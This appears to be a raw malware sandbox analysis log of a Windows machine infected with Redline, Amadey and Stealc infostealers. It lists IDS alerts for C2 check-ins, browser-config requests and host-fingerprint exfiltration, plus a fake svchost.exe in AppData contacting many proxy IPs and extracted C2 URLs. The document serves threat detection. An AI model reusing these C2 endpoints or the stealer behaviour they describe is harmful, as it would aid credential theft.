                                Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 185.172.128.33:8970 -> 192.168.2.5:49710
                                Source: TrafficSnort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.5:58973 -> 77.91.77.81:80
                                Source: TrafficSnort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.5:58978 -> 77.91.77.81:80
                                Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:58980 -> 77.91.77.81:80
                                Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:58981 -> 85.28.47.70:80
                                Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:58981 -> 85.28.47.70:80
                                Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.70:80 -> 192.168.2.5:58981
                                Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:58981 -> 85.28.47.70:80
                                Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.70:80 -> 192.168.2.5:58981
                                Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:58983 -> 77.91.77.81:80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 171.217.69.113 10800
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 170.106.76.24 21707
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 166.0.235.52 35104
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 137.53.152.220 8080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 45.128.133.141 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 184.178.172.5 15303
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 107.152.98.5 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 46.8.60.2 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.10.160.172 10425
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 199.102.104.70 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 104.31.138.26 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 47.121.183.107 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 177.126.86.78 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 113.161.210.60 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 47.121.182.88 8081
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 67.227.158.154 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 177.39.193.109 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 218.201.21.154 83
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 75.119.145.154 37347
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 8.213.156.191 9080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 135.148.10.161 19212
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 198.157.68.47 1337
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 197.98.201.15 10909
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 115.178.181.15 8081
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 67.43.236.20 12797
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.152.112.234 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 190.109.72.25 33633
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 43.129.195.235 8118
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 104.36.166.42 15832
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 185.32.47.105 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.37.216.68 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 182.253.246.213 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 188.209.246.243 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 149.62.193.91 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 184.181.217.201 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 172.135.136.144 8081
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 194.44.74.118 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.10.164.178 2679
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 45.79.189.110 35723
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 162.241.45.22 42021
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.182.52.159 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 20.247.104.85 39918
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 38.57.3.54 46235
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.141.189.62 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 81.12.169.254 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 174.64.199.82 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 192.111.139.163 19404
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 192.111.138.29 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 27.123.3.141 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 57.139.102.111 22
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.111.22.65 58563
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 176.112.96.2 3629
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 129.126.65.78 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 31.200.242.201 12196
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 92.241.66.138 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.205.128.7 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.47.93.236 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 222.165.223.138 41541
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 47.116.210.163 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 201.71.2.177 999
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 162.214.75.237 24949
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 67.43.228.251 1961
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 185.78.16.76 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 8.130.36.245 8888
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 141.105.107.152 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 36.82.203.68 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 38.57.3.39 28506
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 197.251.236.226 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 107.180.101.226 37552
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 148.72.210.123 7749
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 195.2.78.251 1987
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 114.108.177.104 60984
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 24.249.199.4 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 193.200.151.158 8192
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 177.72.82.9 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 212.19.171.48 8080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 117.74.65.207 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 104.18.11.5 443
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 97.74.229.3 45644
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 173.212.237.43 9170
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 195.2.76.207 11531
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 198.12.253.239 39820
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.195.34.58 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 178.62.7.98 33475
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.121.214.50 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 66.29.128.244 41496
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 148.72.212.125 21307
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.210.29.201 31433
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.135.7.2 63123
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 199.58.184.97 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 174.64.199.79 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 207.55.240.19 59714
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 78.146.180.112 110
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 76.26.114.253 39593
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 213.160.71.130 10664
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 148.72.212.252 64753
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 186.248.197.210 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 45.251.57.49 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 166.62.88.163 14827
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 142.54.235.9 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 223.19.139.172 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 192.252.214.20 15864
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 183.88.157.154 8080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 128.199.183.41 39047
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 109.238.12.156 50539
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.124.137.251 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 166.0.235.5 53215
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 49.229.36.170 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 184.178.172.11 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.79.152.204 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 45.234.100.102 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 8.130.39.117 9999
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.130.113.245 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 50.63.12.33 57800
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.195.34.42 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 47.90.167.27 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 8.213.128.90 8060
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 185.122.204.56 41543
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 200.85.169.221 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 174.77.111.198 49547
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 174.77.111.196 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.54.148.189 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 185.18.198.163 38188
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 83.234.147.166 6363
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 201.204.47.66 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 58.57.2.46 10800
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 190.14.155.198 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 110.139.128.232 4145
                                Source: Malware configuration extractorURLs: http://85.28.47.70/570d5d5e8678366c.php
                                Source: Malware configuration extractorURLs: http://85.28.47.70/570d5d5e8678366c.php
                                Source: Malware configuration extractorURLs: 45.66.231.158
                                Source: Malware configuration extractorIPs: 185.172.128.116
                                Source: Malware configuration extractorURLs: 185.172.128.33:8970
                                Source: global trafficTCP traffic: 174.247.55.150 ports 48931,1,3,4,8,9
                                Source: global trafficTCP traffic: 166.0.235.52 ports 0,1,3,4,35104,5
                                Source: global trafficTCP traffic: 72.10.160.172 ports 0,1,10425,2,4,5
                                Source: global trafficTCP traffic: 104.36.166.42 ports 1,2,3,5,8,15832
                                Source: global trafficTCP traffic: 45.124.84.110 ports 15473,1,3,4,5,7
                                Source: global trafficTCP traffic: 38.57.3.54 ports 46235,2,3,4,5,6
                                Source: global trafficTCP traffic: 162.214.197.102 ports 1,4,5,6,9,64195
                                Source: global trafficTCP traffic: 38.57.3.39 ports 28506,0,2,5,6,8
                                Source: global trafficTCP traffic: 148.72.23.56 ports 41592,1,2,4,5,9
                                Source: global trafficTCP traffic: 114.108.177.104 ports 0,4,60984,6,8,9
                                Source: global trafficTCP traffic: 117.74.65.207 ports 0,1,5,8,80,5801
                                Source: global trafficTCP traffic: 166.0.235.139 ports 56290,0,2,5,6,9
                                Source: global trafficTCP traffic: 198.12.253.239 ports 0,2,3,8,9,39820
                                Source: global trafficTCP traffic: 148.72.212.125 ports 21307,0,1,2,3,7
                                Source: global trafficTCP traffic: 108.179.219.56 ports 1,4,5,6,8,16458
                                Source: global trafficTCP traffic: 207.55.240.19 ports 1,59714,4,5,7,9
                                Source: global trafficTCP traffic: 148.72.212.252 ports 64753,3,4,5,6,7
                                Source: global trafficTCP traffic: 166.62.88.163 ports 14827,1,2,4,7,8
                                Source: global trafficTCP traffic: 169.239.223.136 ports 1,2,5,7,52178,8
                                Source: global trafficTCP traffic: 128.199.183.41 ports 39047,0,3,4,7,9
                                Source: global trafficTCP traffic: 45.89.19.85 ports 15397,1,3,5,7,9
                                Source: global trafficTCP traffic: 213.136.93.115 ports 14087,0,1,4,7,8
                                Source: unknownNetwork traffic detected: HTTP traffic on port 58985 -> 8888
                                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 58985
                                Source: unknownNetwork traffic detected: HTTP traffic on port 21707 -> 59240
                                Source: Yara matchFile source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPE
                                Source: unknownNetwork traffic detected: IP country count 31
                                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 185.172.128.33:8970
                                Source: global trafficTCP traffic: 192.168.2.5:58985 -> 43.153.49.49:8888
                                Source: global trafficTCP traffic: 192.168.2.5:59103 -> 185.215.113.67:40960
                                Source: global trafficTCP traffic: 192.168.2.5:59220 -> 47.121.183.107:3128
                                Source: global trafficTCP traffic: 192.168.2.5:59219 -> 174.64.199.82:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59221 -> 222.165.223.138:41541
                                Source: global trafficTCP traffic: 192.168.2.5:59222 -> 198.157.68.47:1337
                                Source: global trafficTCP traffic: 192.168.2.5:59223 -> 47.121.182.88:8081
                                Source: global trafficTCP traffic: 192.168.2.5:59224 -> 31.200.242.201:12196
                                Source: global trafficTCP traffic: 192.168.2.5:59225 -> 193.200.151.158:8192
                                Source: global trafficTCP traffic: 192.168.2.5:59226 -> 83.234.147.166:6363
                                Source: global trafficTCP traffic: 192.168.2.5:59227 -> 171.217.69.113:10800
                                Source: global trafficTCP traffic: 192.168.2.5:59228 -> 113.161.210.60:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59230 -> 72.195.34.42:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59231 -> 67.43.228.251:1961
                                Source: global trafficTCP traffic: 192.168.2.5:59232 -> 36.82.203.68:3128
                                Source: global trafficTCP traffic: 192.168.2.5:59233 -> 66.29.128.244:41496
                                Source: global trafficTCP traffic: 192.168.2.5:59234 -> 197.98.201.15:10909
                                Source: global trafficTCP traffic: 192.168.2.5:59235 -> 114.108.177.104:60984
                                Source: global trafficTCP traffic: 192.168.2.5:59236 -> 129.126.65.78:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59237 -> 103.130.113.245:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59238 -> 58.57.2.46:10800
                                Source: global trafficTCP traffic: 192.168.2.5:59240 -> 170.106.76.24:21707
                                Source: global trafficTCP traffic: 192.168.2.5:59241 -> 149.62.193.91:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59242 -> 103.210.29.201:31433
                                Source: global trafficTCP traffic: 192.168.2.5:59243 -> 117.74.65.207:5801
                                Source: global trafficTCP traffic: 192.168.2.5:59244 -> 148.72.212.125:21307
                                Source: global trafficTCP traffic: 192.168.2.5:59245 -> 177.126.86.78:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59246 -> 174.77.111.196:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59247 -> 137.53.152.220:8080
                                Source: global trafficTCP traffic: 192.168.2.5:59248 -> 195.2.78.251:1987
                                Source: global trafficTCP traffic: 192.168.2.5:59250 -> 47.116.210.163:3128
                                Source: global trafficTCP traffic: 192.168.2.5:59251 -> 190.14.155.198:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59252 -> 207.55.240.19:59714
                                Source: global trafficTCP traffic: 192.168.2.5:59253 -> 199.58.184.97:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59254 -> 176.112.96.2:3629
                                Source: global trafficTCP traffic: 192.168.2.5:59255 -> 103.124.137.251:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59256 -> 174.77.111.198:49547
                                Source: global trafficTCP traffic: 192.168.2.5:59257 -> 38.57.3.54:46235
                                Source: global trafficTCP traffic: 192.168.2.5:59258 -> 166.0.235.52:35104
                                Source: global trafficTCP traffic: 192.168.2.5:59259 -> 50.63.12.33:57800
                                Source: global trafficTCP traffic: 192.168.2.5:59260 -> 194.44.74.118:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59261 -> 185.122.204.56:41543
                                Source: global trafficTCP traffic: 192.168.2.5:59262 -> 201.204.47.66:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59263 -> 103.205.128.7:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59264 -> 8.130.39.117:9999
                                Source: global trafficTCP traffic: 192.168.2.5:59265 -> 174.64.199.79:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59267 -> 8.130.36.245:8888
                                Source: global trafficTCP traffic: 192.168.2.5:59268 -> 45.234.100.102:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59269 -> 20.247.104.85:39918
                                Source: global trafficTCP traffic: 192.168.2.5:59270 -> 177.72.82.9:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59271 -> 67.43.236.20:12797
                                Source: global trafficTCP traffic: 192.168.2.5:59272 -> 8.213.128.90:8060
                                Source: global trafficTCP traffic: 192.168.2.5:59274 -> 201.71.2.177:999
                                Source: global trafficTCP traffic: 192.168.2.5:59275 -> 107.180.101.226:37552
                                Source: global trafficTCP traffic: 192.168.2.5:59277 -> 49.229.36.170:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59278 -> 72.37.216.68:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59279 -> 190.109.72.25:33633
                                Source: global trafficTCP traffic: 192.168.2.5:59280 -> 47.90.167.27:3128
                                Source: global trafficTCP traffic: 192.168.2.5:59281 -> 142.54.235.9:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59282 -> 45.79.189.110:35723
                                Source: global trafficTCP traffic: 192.168.2.5:59284 -> 183.88.157.154:8080
                                Source: global trafficTCP traffic: 192.168.2.5:59285 -> 24.249.199.4:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59286 -> 218.201.21.154:83
                                Source: global trafficTCP traffic: 192.168.2.5:59287 -> 213.160.71.130:10664
                                Source: global trafficTCP traffic: 192.168.2.5:59288 -> 45.128.133.141:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59289 -> 76.26.114.253:39593
                                Source: global trafficTCP traffic: 192.168.2.5:59290 -> 107.152.98.5:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59291 -> 166.0.235.5:53215
                                Source: global trafficTCP traffic: 192.168.2.5:59292 -> 115.178.181.15:8081
                                Source: global trafficTCP traffic: 192.168.2.5:59293 -> 43.129.195.235:8118
                                Source: global trafficTCP traffic: 192.168.2.5:59295 -> 103.79.152.204:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59297 -> 103.182.52.159:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59298 -> 103.111.22.65:58563
                                Source: global trafficTCP traffic: 192.168.2.5:59299 -> 92.241.66.138:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59302 -> 184.178.172.5:15303
                                Source: global trafficTCP traffic: 192.168.2.5:59303 -> 109.238.12.156:50539
                                Source: global trafficTCP traffic: 192.168.2.5:59304 -> 173.212.237.43:9170
                                Source: global trafficTCP traffic: 192.168.2.5:59305 -> 178.62.7.98:33475
                                Source: global trafficTCP traffic: 192.168.2.5:59306 -> 103.135.7.2:63123
                                Source: global trafficTCP traffic: 192.168.2.5:59307 -> 182.253.246.213:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59308 -> 162.241.45.22:42021
                                Source: global trafficTCP traffic: 192.168.2.5:59309 -> 110.139.128.232:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59311 -> 185.18.198.163:38188
                                Source: global trafficTCP traffic: 192.168.2.5:59312 -> 185.78.16.76:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59313 -> 199.102.104.70:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59315 -> 200.85.169.221:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59314 -> 184.178.172.11:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59316 -> 97.74.229.3:45644
                                Source: global trafficTCP traffic: 192.168.2.5:59317 -> 103.47.93.236:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59318 -> 8.213.156.191:9080
                                Source: global trafficTCP traffic: 192.168.2.5:59319 -> 103.141.189.62:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59320 -> 45.251.57.49:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59322 -> 81.12.169.254:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59324 -> 185.32.47.105:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59323 -> 195.2.76.207:11531
                                Source: global trafficTCP traffic: 192.168.2.5:59325 -> 186.248.197.210:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59326 -> 128.199.183.41:39047
                                Source: global trafficTCP traffic: 192.168.2.5:59327 -> 38.57.3.39:28506
                                Source: global trafficTCP traffic: 192.168.2.5:59328 -> 141.105.107.152:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59329 -> 166.62.88.163:14827
                                Source: global trafficTCP traffic: 192.168.2.5:59330 -> 103.121.214.50:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59332 -> 72.10.164.178:2679
                                Source: global trafficTCP traffic: 192.168.2.5:59334 -> 148.72.210.123:7749
                                Source: global trafficTCP traffic: 192.168.2.5:59336 -> 75.119.145.154:37347
                                Source: global trafficTCP traffic: 192.168.2.5:59337 -> 104.36.166.42:15832
                                Source: global trafficTCP traffic: 192.168.2.5:59338 -> 198.12.253.239:39820
                                Source: global trafficTCP traffic: 192.168.2.5:59339 -> 188.209.246.243:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59341 -> 135.148.10.161:19212
                                Source: global trafficTCP traffic: 192.168.2.5:59342 -> 46.8.60.2:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59343 -> 148.72.212.252:64753
                                Source: global trafficTCP traffic: 192.168.2.5:59344 -> 72.10.160.172:10425
                                Source: global trafficTCP traffic: 192.168.2.5:59345 -> 184.181.217.201:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59346 -> 212.19.171.48:8080
                                Source: global trafficTCP traffic: 192.168.2.5:59347 -> 177.39.193.109:3128
                                Source: global trafficTCP traffic: 192.168.2.5:59348 -> 103.54.148.189:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59350 -> 27.123.3.141:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59351 -> 162.214.75.237:24949
                                Source: global trafficTCP traffic: 192.168.2.5:59352 -> 72.195.34.58:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59355 -> 197.251.236.226:5678
                                Source: global trafficTCP traffic: 192.168.2.5:59356 -> 200.108.190.129:9800
                                Source: global trafficTCP traffic: 192.168.2.5:59357 -> 45.124.84.110:15473
                                Source: global trafficTCP traffic: 192.168.2.5:59358 -> 94.131.7.1:31991
                                Source: global trafficTCP traffic: 192.168.2.5:59360 -> 211.118.30.69:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59361 -> 181.143.61.124:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59362 -> 103.148.45.167:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59363 -> 169.239.223.136:52178
                                Source: global trafficTCP traffic: 192.168.2.5:59364 -> 103.14.251.16:4153
                                Source: global trafficTCP traffic: 192.168.2.5:59365 -> 95.48.193.246:1080
                                Source: global trafficTCP traffic: 192.168.2.5:59366 -> 125.25.184.10:4145
                                Source: global trafficTCP traffic: 192.168.2.5:59367 -> 92.205.110.118:46394
                                Source: global trafficTCP traffic: 192.168.2.5:59368 -> 45.89.19.85:15397
                                Source: global trafficTCP traffic: 192.168.2.5:59370 -> 177.33.84.232:47796
                                Source: global trafficTCP traffic: 192.168.2.5:59371 -> 94.198.213.252:5678
